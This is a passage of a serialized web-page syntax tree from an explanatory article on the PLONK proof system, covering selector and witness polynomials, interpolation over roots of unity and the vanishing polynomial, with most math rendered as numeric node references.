",{"type":27,"tag":84,"props":148976,"children":148978},{"className":148977},[11266,11267],[148979],{"type":27,"tag":207,"props":148980,"children":148982},{"className":148981},[11272],[148983],{"type":27,"tag":207,"props":148984,"children":148986},{"className":148985,"ariaHidden":11278},[11277],[148987],{"type":27,"tag":207,"props":148988,"children":148990},{"className":148989},[11283],[148991,148995],{"type":27,"tag":207,"props":148992,"children":148994},{"className":148993,"style":117221},[11288],[],{"type":27,"tag":207,"props":148996,"children":148998},{"className":148997},[11294],[148999,149004],{"type":27,"tag":207,"props":149000,"children":149002},{"className":149001,"style":100264},[11294,28860],[149003],{"type":33,"value":101083},{"type":27,"tag":207,"props":149005,"children":149007},{"className":149006},[11309],[149008],{"type":27,"tag":207,"props":149009,"children":149011},{"className":149010},[11314,28914],[149012,149041],{"type":27,"tag":207,"props":149013,"children":149015},{"className":149014},[11319],[149016,149036],{"type":27,"tag":207,"props":149017,"children":149019},{"className":149018,"style":100793},[11324],[149020],{"type":27,"tag":207,"props":149021,"children":149022},{"style":117250},[149023,149027],{"type":27,"tag":207,"props":149024,"children":149026},{"className":149025,"style":11334},[11333],[],{"type":27,"tag":207,"props":149028,"children":149030},{"className":149029},[11339,11340,11341,11342],[149031],{"type":27,"tag":207,"props":149032,"children":149034},{"className":149033},[11294,28860,11342],[149035],{"type":33,"value":4690},{"type":27,"tag":207,"props":149037,"children":149039},{"className":149038},[29017],[149040],{"type":33,"value":29020},{"type":27,"tag":207,"props":149042,"children":149044},{"className":149043},[11319],[149045],{"type":27,"tag":207,"props":149046,"children":149048},{"className":149047,"style":100347},[11324],[149049],{"type":27,"tag":207,"props":149050,"children":149051},{},[],{"type":33,"value":149053},", and output ",{"type":27,"tag":84,"props":149055,"children":149057},{"className":149056},[11266,11267],[149058],{"type":27,"tag":207,"props":149059,"children":149061},{"className":149060},[11272],[149062],{"type":27,"tag":207,"props":149063,"children":149065},{"className":149064,"ariaHidden":11278},[11277],[149066],{"type":27,"tag":207,"props":149067,"children":149069},{"className":149068},[11283],[149070,149074],{"type":27,"tag":207,"props":149071,"children":149073},{"className":149072,"style":117221},[11288],[],{"type":27,"tag":207,"props":149075,"children":149077},{"className":149076},[11294],[149078,149083],{"type":27,"tag":207,"props":149079,"children":149081},{"className":149080},[11294,28860],[149082],{"type":33,"value":100234},{"type":27,"tag":207,"props":149084,"children":149086},{"className":149085},[11309],[149087],{"type":27,"tag":207,"props":149088,"children":149090},{"className":149089},[11314,28914],[149091,149120],{"type":27,"tag":207,"props":149092,"children":149094},{"className":149093},[11319],[149095,149115],{"type":27,"tag":207,"props":149096,"children":149098},{"className":149097,"style":100793},[11324],[149099],{"type":27,"tag":207,"props":149100,"children":149101},{"style":100320},[149102,149106],{"type":27,"tag":207,"props":149103,"children":149105},{"className":149104,"style":11334},[11333],[],{"type":27,"tag":207,"props":149107,"children":149109},{"className":149108},[11339,11340,11341,11342],[149110],{"type":27,"tag":207,"props":149111,"children":149113},{"className":149112},[11294,28860,11342],[149114],{"type":33,"value":4690},{"type":27,"tag":207,"props":149116,"children":149118},{"className":149117},[29017],[149119],{"type":33,"value":29020},{"type":27,"tag":207,"props":149121,"children":149123},{"className":149122},[11319],[149124],{"type":27,"tag":207,"props":149125,"children":149127},{"className":149126,"style":100347},[11324],[149128],{"type":27,"tag":207,"props":149129,"children":149130},{},[],{"type":33,"value":149132},". The prover's job is to show it knows wire values that satisfy every gate.",{"type":27,"tag":36,"props":149134,"children":149135},{},[149136,149138,149143,149145,149249,149251,149354,149356,149361],{"type":33,"value":149137},"Each gate imposes a constraint, and PLONK unifies all gate types into one expression using ",{"type":27,"tag":942,"props":149139,"children":149140},{},[149141],{"type":33,"value":149142},"selector",{"type":33,"value":149144}," values that act as switches: setting ",{"type":27,"tag":84,"props":149146,"children":149148},{"className":149147},[11266,11267],[149149],{"type":27,"tag":207,"props":149150,"children":149152},{"className":149151},[11272],[149153],{"type":27,"tag":207,"props":149154,"children":149156},{"className":149155,"ariaHidden":11278},[11277],[149157,149236],{"type":27,"tag":207,"props":149158,"children":149160},{"className":149159},[11283],[149161,149165,149223,149227,149232],{"type":27,"tag":207,"props":149162,"children":149164},{"className":149163,"style":117141},[11288],[],{"type":27,"tag":207,"props":149166,"children":149168},{"className":149167},[11294],[149169,149174],{"type":27,"tag":207,"props":149170,"children":149172},{"className":149171,"style":100750},[11294,28860],[149173],{"type":33,"value":100753},{"type":27,"tag":207,"props":149175,"children":149177},{"className":149176},[11309],[149178],{"type":27,"tag":207,"props":149179,"children":149181},{"className":149180},[11314,28914],[149182,149212],{"type":27,"tag":207,"props":149183,"children":149185},{"className":149184},[11319],[149186,149207],{"type":27,"tag":207,"props":149187,"children":149190},{"className":149188,"style":149189},[11324],"height:0.3283em;",[149191],{"type":27,"tag":207,"props":149192,"children":149193},{"style":100797},[149194,149198],{"type":27,"tag":207,"props":149195,"children":149197},{"className":149196,"style":11334},[11333],[],{"type":27,"tag":207,"props":149199,"children":149201},{"className":149200},[11339,11340,11341,11342],[149202],{"type":27,"tag":207,"props":149203,"children":149205},{"className":149204,"style":102272},[11294,28860,11342],[149206],{"type":33,"value":102275},{"type":27,"tag":207,"props":149208,"children":149210},{"className":149209},[29017],[149211],{"type":33,"value":29020},{"type":27,"tag":207,"props":149213,"children":149215},{"className":149214},[11319],[149216],{"type":27,"tag":207,"props":149217,"children":149219},{"className":149218,"style":100347},[11324],[149220],{"type":27,"tag":207,"props":149221,"children":149222},{},[],{"type":27,"tag":207,"props":149224,"children":149226},{"className":149225,"style":11470},[11372],[],{"type":27,"tag":207,"props":149228,"children":149230},{"className":149229},[11475],[149231],{"type":33,"value":10380},{"type":27,"tag":207,"props":149233,"children":149235},{"className":149234,"style":11470},[11372],[],{"type":27,"tag":207,"props":149237,"children":149239},{"className":149238},[11283],[149240,149244],{"type":27,"tag":207,"props":149241,"children":149243},{"className":149242,"style":101295},[11288],[],{"type":27,"tag":207,"props":149245,"children":149247},{"className":149246},[11294],[149248],{"type":33,"value":1651},{"type":33,"value":149250}," makes a row a multiplication gate, setting ",{"type":27,"tag":84,"props":149252,"children":149254},{"className":149253},[11266,11267],[149255],{"type":27,"tag":207,"props":149256,"children":149258},{"className":149257},[11272],[149259],{"type":27,"tag":207,"props":149260,"children":149262},{"className":149261,"ariaHidden":11278},[11277],[149263,149341],{"type":27,"tag":207,"props":149264,"children":149266},{"className":149265},[11283],[149267,149271,149328,149332,149337],{"type":27,"tag":207,"props":149268,"children":149270},{"className":149269,"style":117141},[11288],[],{"type":27,"tag":207,"props":149272,"children":149274},{"className":149273},[11294],[149275,149280],{"type":27,"tag":207,"props":149276,"children":149278},{"className":149277,"style":100750},[11294,28860],[149279],{"type":33,"value":100753},{"type":27,"tag":207,"props":149281,"children":149283},{"className":149282},[11309],[149284],{"type":27,"tag":207,"props":149285,"children":149287},{"className":149286},[11314,28914],[149288,149317],{"type":27,"tag":207,"props":149289,"children":149291},{"className":149290},[11319],[149292,149312],{"type":27,"tag":207,"props":149293,"children":149295},{"className":149294,"style":149189},[11324],[149296],{"type":27,"tag":207,"props":149297,"children":149298},{"style":100797},[149299,149303],{"type":27,"tag":207,"props":149300,"children":149302},{"className":149301,"style":11334},[11333],[],{"type":27,"tag":207,"props":149304,"children":149306},{"className":149305},[11339,11340,11341,11342],[149307],{"type":27,"tag":207,"props":149308,"children":149310},{"className":149309},[11294,28860,11342],[149311],{"type":33,"value":125214},{"type":27,"tag":207,"props":149313,"children":149315},{"className":149314},[29017],[149316],{"type":33,"value":29020},{"type":27,"tag":207,"props":149318,"children":149320},{"className":149319},[11319],[149321],{"type":27,"tag":207,"props":149322,"children":149324},{"className":149323,"style":100347},[11324],[149325],{"type":27,"tag":207,"props":149326,"children":149327},{},[],{"type":27,"tag":207,"props":149329,"children":149331},{"className":149330,"style":11470},[11372],[],{"type":27,"tag":207,"props":149333,"children":149335},{"className":149334},[11475],[149336],{"type":33,"value":10380},{"type":27,"tag":207,"props":149338,"children":149340},{"className":149339,"style":11470},[11372],[],{"type":27,"tag":207,"props":149342,"children":149344},{"className":149343},[11283],[149345,149349],{"type":27,"tag":207,"props":149346,"children":149348},{"className":149347,"style":101295},[11288],[],{"type":27,"tag":207,"props":149350,"children":149352},{"className":149351},[11294],[149353],{"type":33,"value":1651},{"type":33,"value":149355}," makes it contribute an addition term, and so on. The selector values define the circuit's shape and are public, known to both prover and verifier, while the wire values are the prover's secret witness. This per-row check does not ensure that wires between gates are consistent (that the output of one gate equals the input of the next); PLONK uses a separate ",{"type":27,"tag":942,"props":149357,"children":149358},{},[149359],{"type":33,"value":149360},"permutation argument",{"type":33,"value":149362}," for that, which we will not cover here.",{"type":27,"tag":58,"props":149364,"children":149366},{"id":149365},"from-many-checks-to-one",[149367],{"type":33,"value":149368},"From many checks to one",{"type":27,"tag":36,"props":149370,"children":149371},{},[149372,149374,149379,149380,149472,149473,149565,149566,149658,149660,149665,149666,149758,149759,149851,149853,149878,149880,149905,149907,149999,150001,150026,150028,150053],{"type":33,"value":149373},"Instead of checking each gate individually, PLONK reads the execution trace column by column and uses FFT interpolation to convert each array of values to a single polynomial. The wire values become ",{"type":27,"tag":942,"props":149375,"children":149376},{},[149377],{"type":33,"value":149378},"witness polynomials",{"type":33,"value":13740},{"type":27,"tag":84,"props":149381,"children":149383},{"className":149382},[11266,11267],[149384],{"type":27,"tag":207,"props":149385,"children":149387},{"className":149386},[11272],[149388],{"type":27,"tag":207,"props":149389,"children":149391},{"className":149390,"ariaHidden":11278},[11277],[149392],{"type":27,"tag":207,"props":149393,"children":149395},{"className":149394},[11283],[149396,149400,149457,149462,149467],{"type":27,"tag":207,"props":149397,"children":149399},{"className":149398,"style":11393},[11288],[],{"type":27,"tag":207,"props":149401,"children":149403},{"className":149402},[11294],[149404,149409],{"type":27,"tag":207,"props":149405,"children":149407},{"className":149406,"style":102618},[11294,28860],[149408],{"type":33,"value":7596},{"type":27,"tag":207,"props":149410,"children":149412},{"className":149411},[11309],[149413],{"type":27,"tag":207,"props":149414,"children":149416},{"className":149415},[11314,28914],[149417,149446],{"type":27,"tag":207,"props":149418,"children":149420},{"className":149419},[11319],[149421,149441],{"type":27,"tag":207,"props":149422,"children":149424},{"className":149423,"style":149189},[11324],[149425],{"type":27,"tag":207,"props":149426,"children":149427},{"style":102639},[149428,149432],{"type":27,"tag":207,"props":149429,"children":149431},{"className":149430,"style":11334},[11333],[],{"type":27,"tag":207,"props":149433,"children":149435},{"className":149434},[11339,11340,11341,11342],[149436],{"type":27,"tag":207,"props":149437,"children":149439},{"className":149438},[11294,28860,11342],[149440],{"type":33,"value":125214},{"type":27,"tag":207,"props":149442,"children":149444},{"className":149443},[29017],[149445],{"type":33,"value":29020},{"type":27,"tag":207,"props":149447,"children":149449},{"className":149448},[11319],[149450],{"type":27,"tag":207,"props":149451,"children":149453},{"className":149452,"style":100347},[11324],[149454],{"type":27,"tag":207,"props":149455,"children":149456},{},[],{"type":27,"tag":207,"props":149458,"children":149460},{"className":149459},[28989],[149461],{"type":33,"value":1343},{"type":27,"tag":207,"props":149463,"children":149465},{"className":149464},[11294,28860],[149466],{"type":33,"value":26546},{"type":27,"tag":207,"props":149468,"children":149470},{"className":149469},[29011],[149471],{"type":33,"value":10416},{"type":33,"value":1123},{"type":27,"tag":84,"props":149474,"children":149476},{"className":149475},[11266,11267],[149477],{"type":27,"tag":207,"props":149478,"children":149480},{"className":149479},[11272],[149481],{"type":27,"tag":207,"props":149482,"children":149484},{"className":149483,"ariaHidden":11278},[11277],[149485],{"type":27,"tag":207,"props":149486,"children":149488},{"className":149487},[11283],[149489,149493,149550,149555,149560],{"type":27,"tag":207,"props":149490,"children":149492},{"className":149491,"style":11393},[11288],[],{"type":27,"tag":207,"props":149494,"children":149496},{"className":149495},[11294],[149497,149502],{"type":27,"tag":207,"props":149498,"children":149500},{"className":149499,"style":102618},[11294,28860],[149501],{"type":33,"value":7596},{"type":27,"tag":207,"props":149503,"children":149505},{"className":149504},[11309],[149506],{"type":27,"tag":207,"props":149507,"children":149509},{"className":149508},[11314,28914],[149510,149539],{"type":27,"tag":207,"props":149511,"children":149513},{"className":149512},[11319],[149514,149534],{"type":27,"tag":207,"props":149515,"children":149517},{"className":149516,"style":149189},[11324],[149518],{"type":27,"tag":207,"props":149519,"children":149520},{"style":102639},[149521,149525],{"type":27,"tag":207,"props":149522,"children":149524},{"className":149523,"style":11334},[11333],[],{"type":27,"tag":207,"props":149526,"children":149528},{"className":149527},[11339,11340,11341,11342],[149529],{"type":27,"tag":207,"props":149530,"children":149532},{"className":149531,"style":130027},[11294,28860,11342],[149533],{"type":33,"value":130030},{"type":27,"tag":207,"props":149535,"children":149537},{"className":149536},[29017],[149538],{"type":33,"value":29020},{"type":27,"tag":207,"props":149540,"children":149542},{"className":149541},[11319],[149543],{"type":27,"tag":207,"props":149544,"children":149546},{"className":149545,"style":100347},[11324],[149547],{"type":27,"tag":207,"props":149548,"children":149549},{},[],{"type":27,"tag":207,"props":149551,"children":149553},{"className":149552},[28989],[149554],{"type":33,"value":1343},{"type":27,"tag":207,"props":149556,"children":149558},{"className":149557},[11294,28860],[149559],{"type":33,"value":26546},{"type":27,"tag":207,"props":149561,"children":149563},{"className":149562},[29011],[149564],{"type":33,"value":10416},{"type":33,"value":1123},{"type":27,"tag":84,"props":149567,"children":149569},{"className":149568},[11266,11267],[149570],{"type":27,"tag":207,"props":149571,"children":149573},{"className":149572},[11272],[149574],{"type":27,"tag":207,"props":149575,"children":149577},{"className":149576,"ariaHidden":11278},[11277],[149578],{"type":27,"tag":207,"props":149579,"children":149581},{"className":149580},[11283],[149582,149586,149643,149648,149653],{"type":27,"tag":207,"props":149583,"children":149585},{"className":149584,"style":11393},[11288],[],{"type":27,"tag":207,"props":149587,"children":149589},{"className":149588},[11294],[149590,149595],{"type":27,"tag":207,"props":149591,"children":149593},{"className":149592,"style":102618},[11294,28860],[149594],{"type":33,"value":7596},{"type":27,"tag":207,"props":149596,"children":149598},{"className":149597},[11309],[149599],{"type":27,"tag":207,"props":149600,"children":149602},{"className":149601},[11314,28914],[149603,149632],{"type":27,"tag":207,"props":149604,"children":149606},{"className":149605},[11319],[149607,149627],{"type":27,"tag":207,"props":149608,"children":149610},{"className":149609,"style":149189},[11324],[149611],{"type":27,"tag":207,"props":149612,"children":149613},{"style":102639},[149614,149618],{"type":27,"tag":207,"props":149615,"children":149617},{"className":149616,"style":11334},[11333],[],{"type":27,"tag":207,"props":149619,"children":149621},{"className":149620},[11339,11340,11341,11342],[149622],{"type":27,"tag":207,"props":149623,"children":149625},{"className":149624,"style":100264},[11294,28860,11342],[149626],{"type":33,"value":122569},{"type":27,"tag":207,"props":149628,"children":149630},{"className":149629},[29017],[149631],{"type":33,"value":29020},{"type":27,"tag":207,"props":149633,"children":149635},{"className":149634},[11319],[149636],{"type":27,"tag":207,"props":149637,"children":149639},{"className":149638,"style":100347},[11324],[149640],{"type":27,"tag":207,"props":149641,"children":149642},{},[],{"type":27,"tag":207,"props":149644,"children":149646},{"className":149645},[28989],[149647],{"type":33,"value":1343},{"type":27,"tag":207,"props":149649,"children":149651},{"className":149650},[11294,28860],[149652],{"type":33,"value":26546},{"type":27,"tag":207,"props":149654,"children":149656},{"className":149655},[29011],[149657],{"type":33,"value":10416},{"type":33,"value":149659}," and the selectors become ",{"type":27,"tag":942,"props":149661,"children":149662},{},[149663],{"type":33,"value":149664},"selector polynomials",{"type":33,"value":13740},{"type":27,"tag":84,"props":149667,"children":149669},{"className":149668},[11266,11267],[149670],{"type":27,"tag":207,"props":149671,"children":149673},{"className":149672},[11272],[149674],{"type":27,"tag":207,"props":149675,"children":149677},{"className":149676,"ariaHidden":11278},[11277],[149678],{"type":27,"tag":207,"props":149679,"children":149681},{"className":149680},[11283],[149682,149686,149743,149748,149753],{"type":27,"tag":207,"props":149683,"children":149685},{"className":149684,"style":11393},[11288],[],{"type":27,"tag":207,"props":149687,"children":149689},{"className":149688},[11294],[149690,149695],{"type":27,"tag":207,"props":149691,"children":149693},{"className":149692},[11294,28860],[149694],{"type":33,"value":84033},{"type":27,"tag":207,"props":149696,"children":149698},{"className":149697},[11309],[149699],{"type":27,"tag":207,"props":149700,"children":149702},{"className":149701},[11314,28914],[149703,149732],{"type":27,"tag":207,"props":149704,"children":149706},{"className":149705},[11319],[149707,149727],{"type":27,"tag":207,"props":149708,"children":149710},{"className":149709,"style":149189},[11324],[149711],{"type":27,"tag":207,"props":149712,"children":149713},{"style":100320},[149714,149718],{"type":27,"tag":207,"props":149715,"children":149717},{"className":149716,"style":11334},[11333],[],{"type":27,"tag":207,"props":149719,"children":149721},{"className":149720},[11339,11340,11341,11342],[149722],{"type":27,"tag":207,"props":149723,"children":149725},{"className":149724,"style":102272},[11294,28860,11342],[149726],{"type":33,"value":102275},{"type":27,"tag":207,"props":149728,"children":149730},{"className":149729},[29017],[149731],{"type":33,"value":29020},{"type":27,"tag":207,"props":149733,"children":149735},{"className":149734},[11319],[149736],{"type":27,"tag":207,"props":149737,"children":149739},{"className":149738,"style":100347},[11324],[149740],{"type":27,"tag":207,"props":149741,"children":149742},{},[],{"type":27,"tag":207,"props":149744,"children":149746},{"className":149745},[28989],[149747],{"type":33,"value":1343},{"type":27,"tag":207,"props":149749,"children":149751},{"className":149750},[11294,28860],[149752],{"type":33,"value":26546},{"type":27,"tag":207,"props":149754,"children":149756},{"className":149755},[29011],[149757],{"type":33,"value":10416},{"type":33,"value":1123},{"type":27,"tag":84,"props":149760,"children":149762},{"className":149761},[11266,11267],[149763],{"type":27,"tag":207,"props":149764,"children":149766},{"className":149765},[11272],[149767],{"type":27,"tag":207,"props":149768,"children":149770},{"className":149769,"ariaHidden":11278},[11277],[149771],{"type":27,"tag":207,"props":149772,"children":149774},{"className":149773},[11283],[149775,149779,149836,149841,149846],{"type":27,"tag":207,"props":149776,"children":149778},{"className":149777,"style":11393},[11288],[],{"type":27,"tag":207,"props":149780,"children":149782},{"className":149781},[11294],[149783,149788],{"type":27,"tag":207,"props":149784,"children":149786},{"className":149785},[11294,28860],[149787],{"type":33,"value":84033},{"type":27,"tag":207,"props":149789,"children":149791},{"className":149790},[11309],[149792],{"type":27,"tag":207,"props":149793,"children":149795},{"className":149794},[11314,28914],[149796,149825],{"type":27,"tag":207,"props":149797,"children":149799},{"className":149798},[11319],[149800,149820],{"type":27,"tag":207,"props":149801,"children":149803},{"className":149802,"style":149189},[11324],[149804],{"type":27,"tag":207,"props":149805,"children":149806},{"style":100320},[149807,149811],{"type":27,"tag":207,"props":149808,"children":149810},{"className":149809,"style":11334},[11333],[],{"type":27,"tag":207,"props":149812,"children":149814},{"className":149813},[11339,11340,11341,11342],[149815],{"type":27,"tag":207,"props":149816,"children":149818},{"className":149817},[11294,28860,11342],[149819],{"type":33,"value":125214},{"type":27,"tag":207,"props":149821,"children":149823},{"className":149822},[29017],[149824],{"type":33,"value":29020},{"type":27,"tag":207,"props":149826,"children":149828},{"className":149827},[11319],[149829],{"type":27,"tag":207,"props":149830,"children":149832},{"className":149831,"style":100347},[11324],[149833],{"type":27,"tag":207,"props":149834,"children":149835},{},[],{"type":27,"tag":207,"props":149837,"children":149839},{"className":149838},[28989],[149840],{"type":33,"value":1343},{"type":27,"tag":207,"props":149842,"children":149844},{"className":149843},[11294,28860],[149845],{"type":33,"value":26546},{"type":27,"tag":207,"props":149847,"children":149849},{"className":149848},[29011],[149850],{"type":33,"value":10416},{"type":33,"value":149852},", etc., all interpolated over a domain ",{"type":27,"tag":84,"props":149854,"children":149856},{"className":149855},[11266,11267],[149857],{"type":27,"tag":207,"props":149858,"children":149860},{"className":149859},[11272],[149861],{"type":27,"tag":207,"props":149862,"children":149864},{"className":149863,"ariaHidden":11278},[11277],[149865],{"type":27,"tag":207,"props":149866,"children":149868},{"className":149867},[11283],[149869,149873],{"type":27,"tag":207,"props":149870,"children":149872},{"className":149871,"style":28855},[11288],[],{"type":27,"tag":207,"props":149874,"children":149876},{"className":149875,"style":100498},[11294,28860],[149877],{"type":33,"value":100501},{"type":33,"value":149879}," of ",{"type":27,"tag":84,"props":149881,"children":149883},{"className":149882},[11266,11267],[149884],{"type":27,"tag":207,"props":149885,"children":149887},{"className":149886},[11272],[149888],{"type":27,"tag":207,"props":149889,"children":149891},{"className":149890,"ariaHidden":11278},[11277],[149892],{"type":27,"tag":207,"props":149893,"children":149895},{"className":149894},[11283],[149896,149900],{"type":27,"tag":207,"props":149897,"children":149899},{"className":149898,"style":118092},[11288],[],{"type":27,"tag":207,"props":149901,"children":149903},{"className":149902},[11294,28860],[149904],{"type":33,"value":63637},{"type":33,"value":149906},"-th roots of unity. Evaluating ",{"type":27,"tag":84,"props":149908,"children":149910},{"className":149909},[11266,11267],[149911],{"type":27,"tag":207,"props":149912,"children":149914},{"className":149913},[11272],[149915],{"type":27,"tag":207,"props":149916,"children":149918},{"className":149917,"ariaHidden":11278},[11277],[149919],{"type":27,"tag":207,"props":149920,"children":149922},{"className":149921},[11283],[149923,149927,149984,149989,149994],{"type":27,"tag":207,"props":149924,"children":149926},{"className":149925,"style":11393},[11288],[],{"type":27,"tag":207,"props":149928,"children":149930},{"className":149929},[11294],[149931,149936],{"type":27,"tag":207,"props":149932,"children":149934},{"className":149933,"style":102618},[11294,28860],[149935],{"type":33,"value":7596},{"type":27,"tag":207,"props":149937,"children":149939},{"className":149938},[11309],[149940],{"type":27,"tag":207,"props":149941,"children":149943},{"className":149942},[11314,28914],[149944,149973],{"type":27,"tag":207,"props":149945,"children":149947},{"className":149946},[11319],[149948,149968],{"type":27,"tag":207,"props":149949,"children":149951},{"className":149950,"style":149189},[11324],[149952],{"type":27,"tag":207,"props":149953,"children":149954},{"style":102639},[149955,149959],{"type":27,"tag":207,"props":149956,"children":149958},{"className":149957,"style":11334},[11333],[],{"type":27,"tag":207,"props":149960,"children":149962},{"className":149961},[11339,11340,11341,11342],[149963],{"type":27,"tag":207,"props":149964,"children":149966},{"className":149965},[11294,28860,11342],[149967],{"type":33,"value":125214},{"type":27,"tag":207,"props":149969,"children":149971},{"className":149970},[29017],[149972],{"type":33,"value":29020},{"type":27,"tag":207,"props":149974,"children":149976},{"className":149975},[11319],[149977],{"type":27,"tag":207,"props":149978,"children":149980},{"className":149979,"style":100347},[11324],[149981],{"type":27,"tag":207,"props":149982,"children":149983},{},[],{"type":27,"tag":207,"props":149985,"children":149987},{"className":149986},[28989],[149988],{"type":33,"value":1343},{"type":27,"tag":207,"props":149990,"children":149992},{"className":149991},[11294,28860],[149993],{"type":33,"value":26546},{"type":27,"tag":207,"props":149995,"children":149997},{"className":149996},[29011],[149998],{"type":33,"value":10416},{"type":33,"value":150000}," at the ",{"type":27,"tag":84,"props":150002,"children":150004},{"className":150003},[11266,11267],[150005],{"type":27,"tag":207,"props":150006,"children":150008},{"className":150007},[11272],[150009],{"type":27,"tag":207,"props":150010,"children":150012},{"className":150011,"ariaHidden":11278},[11277],[150013],{"type":27,"tag":207,"props":150014,"children":150016},{"className":150015},[11283],[150017,150021],{"type":27,"tag":207,"props":150018,"children":150020},{"className":150019,"style":148885},[11288],[],{"type":27,"tag":207,"props":150022,"children":150024},{"className":150023},[11294,28860],[150025],{"type":33,"value":4690},{"type":33,"value":150027},"-th root recovers the left wire value at row ",{"type":27,"tag":84,"props":150029,"children":150031},{"className":150030},[11266,11267],[150032],{"type":27,"tag":207,"props":150033,"children":150035},{"className":150034},[11272],[150036],{"type":27,"tag":207,"props":150037,"children":150039},{"className":150038,"ariaHidden":11278},[11277],[150040],{"type":27,"tag":207,"props":150041,"children":150043},{"className":150042},[11283],[150044,150048],{"type":27,"tag":207,"props":150045,"children":150047},{"className":150046,"style":148885},[11288],[],{"type":27,"tag":207,"props":150049,"children":150051},{"className":150050},[11294,28860],[150052],{"type":33,"value":4690},{"type":33,"value":1041},{"type":27,"tag":150055,"props":150056,"children":150057},"polynomial-interpolation-panel",{},[],{"type":27,"tag":36,"props":150059,"children":150060},{},[150061,150063,150103,150105,150171,150173,150303,150305,150345,150347,150387,150389,150429,150430,150552],{"type":33,"value":150062},"Because all columns are now polynomials, the entire circuit compresses into a single master constraint polynomial ",{"type":27,"tag":84,"props":150064,"children":150066},{"className":150065},[11266,11267],[150067],{"type":27,"tag":207,"props":150068,"children":150070},{"className":150069},[11272],[150071],{"type":27,"tag":207,"props":150072,"children":150074},{"className":150073,"ariaHidden":11278},[11277],[150075],{"type":27,"tag":207,"props":150076,"children":150078},{"className":150077},[11283],[150079,150083,150088,150093,150098],{"type":27,"tag":207,"props":150080,"children":150082},{"className":150081,"style":11393},[11288],[],{"type":27,"tag":207,"props":150084,"children":150086},{"className":150085,"style":28861},[11294,28860],[150087],{"type":33,"value":129028},{"type":27,"tag":207,"props":150089,"children":150091},{"className":150090},[28989],[150092],{"type":33,"value":1343},{"type":27,"tag":207,"props":150094,"children":150096},{"className":150095},[11294,28860],[150097],{"type":33,"value":26546},{"type":27,"tag":207,"props":150099,"children":150101},{"className":150100},[29011],[150102],{"type":33,"value":10416},{"type":33,"value":150104}," that combines selectors and witnesses. If the prover was honest, ",{"type":27,"tag":84,"props":150106,"children":150108},{"className":150107},[11266,11267],[150109],{"type":27,"tag":207,"props":150110,"children":150112},{"className":150111},[11272],[150113],{"type":27,"tag":207,"props":150114,"children":150116},{"className":150115,"ariaHidden":11278},[11277],[150117,150158],{"type":27,"tag":207,"props":150118,"children":150120},{"className":150119},[11283],[150121,150125,150130,150135,150140,150145,150149,150154],{"type":27,"tag":207,"props":150122,"children":150124},{"className":150123,"style":11393},[11288],[],{"type":27,"tag":207,"props":150126,"children":150128},{"className":150127,"style":28861},[11294,28860],[150129],{"type":33,"value":129028},{"type":27,"tag":207,"props":150131,"children":150133},{"className":150132},[28989],[150134],{"type":33,"value":1343},{"type":27,"tag":207,"props":150136,"children":150138},{"className":150137},[11294,28860],[150139],{"type":33,"value":26546},{"type":27,"tag":207,"props":150141,"children":150143},{"className":150142},[29011],[150144],{"type":33,"value":10416},{"type":27,"tag":207,"props":150146,"children":150148},{"className":150147,"style":11470},[11372],[],{"type":27,"tag":207,"props":150150,"children":150152},{"className":150151},[11475],[150153],{"type":33,"value":10380},{"type":27,"tag":207,"props":150155,"children":150157},{"className":150156,"style":11470},[11372],[],{"type":27,"tag":207,"props":150159,"children":150161},{"className":150160},[11283],[150162,150166],{"type":27,"tag":207,"props":150163,"children":150165},{"className":150164,"style":101295},[11288],[],{"type":27,"tag":207,"props":150167,"children":150169},{"className":150168},[11294],[150170],{"type":33,"value":1660},{"type":33,"value":150172}," at every row index in the domain. The vanishing polynomial ",{"type":27,"tag":84,"props":150174,"children":150176},{"className":150175},[11266,11267],[150177],{"type":27,"tag":207,"props":150178,"children":150180},{"className":150179},[11272],[150181],{"type":27,"tag":207,"props":150182,"children":150184},{"className":150183,"ariaHidden":11278},[11277],[150185,150227,150290],{"type":27,"tag":207,"props":150186,"children":150188},{"className":150187},[11283],[150189,150193,150199,150204,150209,150214,150218,150223],{"type":27,"tag":207,"props":150190,"children":150192},{"className":150191,"style":11393},[11288],[],{"type":27,"tag":207,"props":150194,"children":150196},{"className":150195,"style":29392},[11294,28860],[150197],{"type":33,"value":150198},"Z",{"type":27,"tag":207,"props":150200,"children":150202},{"className":150201},[28989],[150203],{"type":33,"value":1343},{"type":27,"tag":207,"props":150205,"children":150207},{"className":150206},[11294,28860],[150208],{"type":33,"value":26546},{"type":27,"tag":207,"props":150210,"children":150212},{"className":150211},[29011],[150213],{"type":33,"value":10416},{"type":27,"tag":207,"props":150215,"children":150217},{"className":150216,"style":11470},[11372],[],{"type":27,"tag":207,"props":150219,"children":150221},{"className":150220},[11475],[150222],{"type":33,"value":10380},{"type":27,"tag":207,"props":150224,"children":150226},{"className":150225,"style":11470},[11372],[],{"type":27,"tag":207,"props":150228,"children":150230},{"className":150229},[11283],[150231,150236,150277,150281,150286],{"type":27,"tag":207,"props":150232,"children":150235},{"className":150233,"style":150234},[11288],"height:0.7477em;vertical-align:-0.0833em;",[],{"type":27,"tag":207,"props":150237,"children":150239},{"className":150238},[11294],[150240,150245],{"type":27,"tag":207,"props":150241,"children":150243},{"className":150242},[11294,28860],[150244],{"type":33,"value":26546},{"type":27,"tag":207,"props":150246,"children":150248},{"className":150247},[11309],[150249],{"type":27,"tag":207,"props":150250,"children":150252},{"className":150251},[11314],[150253],{"type":27,"tag":207,"props":150254,"children":150256},{"className":150255},[11319],[150257],{"type":27,"tag":207,"props":150258,"children":150260},{"className":150259,"style":115968},[11324],[150261],{"type":27,"tag":207,"props":150262,"children":150263},{"style":11328},[150264,150268],{"type":27,"tag":207,"props":150265,"children":150267},{"className":150266,"style":11334},[11333],[],{"type":27,"tag":207,"props":150269,"children":150271},{"className":150270},[11339,11340,11341,11342],[150272],{"type":27,"tag":207,"props":150273,"children":150275},{"className":150274},[11294,28860,11342],[150276],{"type":33,"value":63637},{"type":27,"tag":207,"props":150278,"children":150280},{"className":150279,"style":11373},[11372],[],{"type":27,"tag":207,"props":150282,"children":150284},{"className":150283},[11378],[150285],{"type":33,"value":11353},{"type":27,"tag":207,"props":150287,"children":150289},{"className":150288,"style":11373},[11372],[],{"type":27,"tag":207,"props":150291,"children":150293},{"className":150292},[11283],[150294,150298],{"type":27,"tag":207,"props":150295,"children":150297},{"className":150296,"style":101295},[11288],[],{"type":27,"tag":207,"props":150299,"children":150301},{"className":150300},[11294],[150302],{"type":33,"value":1651},{"type":33,"value":150304}," is zero on exactly those points, so if all constraints hold then 